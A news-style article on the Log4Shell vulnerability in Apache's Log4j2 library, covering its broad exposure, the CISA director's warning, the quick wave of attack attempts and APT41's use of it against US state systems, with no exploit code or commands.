On December 9, 2021a critical zero-day vulnerability affecting Apache’s Log4j2 library, a Java-based logging utility, was revealed to the world and broke the internet.
Java is the third most widely used computer language and is practically ubiquitous, and the Log4j2 library is extremely popular, with an estimated 15 billion devices around the world currently running on Java. The worst part is that Log4j is hard to find and easy to exploit, putting hundreds of millions of Java-based applications, databases and devices at high risk.
The full extent of the risks posed by the vulnerability is unprecedented and encompasses every type of organization in every industry. Because of the ease of the exploit combined with the difficulty of exposing the vulnerability within your organization, Log4Shell is the proverbial needle in a haystack.
Cybersecurity and Infrastructure Security Agency Director Jen Easterly noted that Log4Shell is the “serious” vulnerability she’s seen in her decades-long career. She urged business leaders not to delay recovery processes, noting that it could take years to address this vulnerability. Fixing this vulnerability would not be a simple, one-time process and would require multiple detection methods.
Fast to patch, faster to exploit
As many companies prepared to work with skeletal IT staff in the last two weeks of 2021, hackers and attackers saw an opportunity. It didn’t take long for this critical vulnerability in Java to be exploited in the wild. Nearly 1 million attack attempts were launched in just 72 hours after the vulnerability was revealed.
Worse, as part of an ongoing intelligence-gathering operation, the infamous Chinese hacking group APT41, which has raided local government agencies in at least six US states in the past 10 months, quickly used Log4Shell as the primary vector to control at least two of the states’ computer systems.